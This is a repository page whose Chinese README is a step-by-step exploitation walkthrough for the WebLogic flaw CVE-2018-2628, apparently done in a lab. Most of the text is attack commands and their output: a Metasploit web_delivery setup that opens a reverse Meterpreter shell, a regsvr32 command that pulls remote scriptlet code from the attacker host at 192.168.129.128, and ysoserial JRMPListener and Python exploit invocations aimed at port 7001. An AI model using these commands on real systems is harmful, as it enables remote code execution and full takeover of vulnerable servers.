# CVE-2018-2628-2 **Repository Path**: xdawn/cve-2018-2628-2 ## Basic Information - **Project Name**: CVE-2018-2628-2 - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-10-05 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ## 测试有无漏洞 ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010603.png) ## 上传shell 方式一: ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010537.png) 方式二: ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190107195417.png) ## 执行shell ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010451.png) ## 获得meterpreter ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143024.png) ``` msf > use exploit/multi/script/web_delivery msf exploit(multi/script/web_delivery) > set target 3 target => 3 msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/script/web_delivery) > set lhost 192.168.129.128 lhost => 192.168.129.128 msf exploit(multi/script/web_delivery) > set lport 2333 lport => 2333 msf exploit(multi/script/web_delivery) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.129.128:2333 [*] Using URL: http://0.0.0.0:8080/ZqKpshnepenp8T9 msf exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.129.128:8080/ZqKpshnepenp8T9 [*] Server started. [*] Run the following command on the target machine: regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll [*] 192.168.129.143 web_delivery - Handling .sct Request [*] 192.168.129.143 web_delivery - Delivering Payload [*] Sending stage (179779 bytes) to 192.168.129.143 [*] Meterpreter session 1 opened (192.168.129.128:2333 -> 192.168.129.143:52210) at 2019-01-02 01:29:00 -0500 msf exploit(multi/script/web_delivery) > sessions -i 1 ``` 在cmd下执行 ``` regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll ``` ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143132.png) **进入meterpreter:** ```bash sessions -i 1 ``` ![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143212.png) 方式二: ``` java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/cPeSBp.sct scrobj.dll' python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/7Gcn5at6tOGgzG.sct scrobj.dll' python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient ```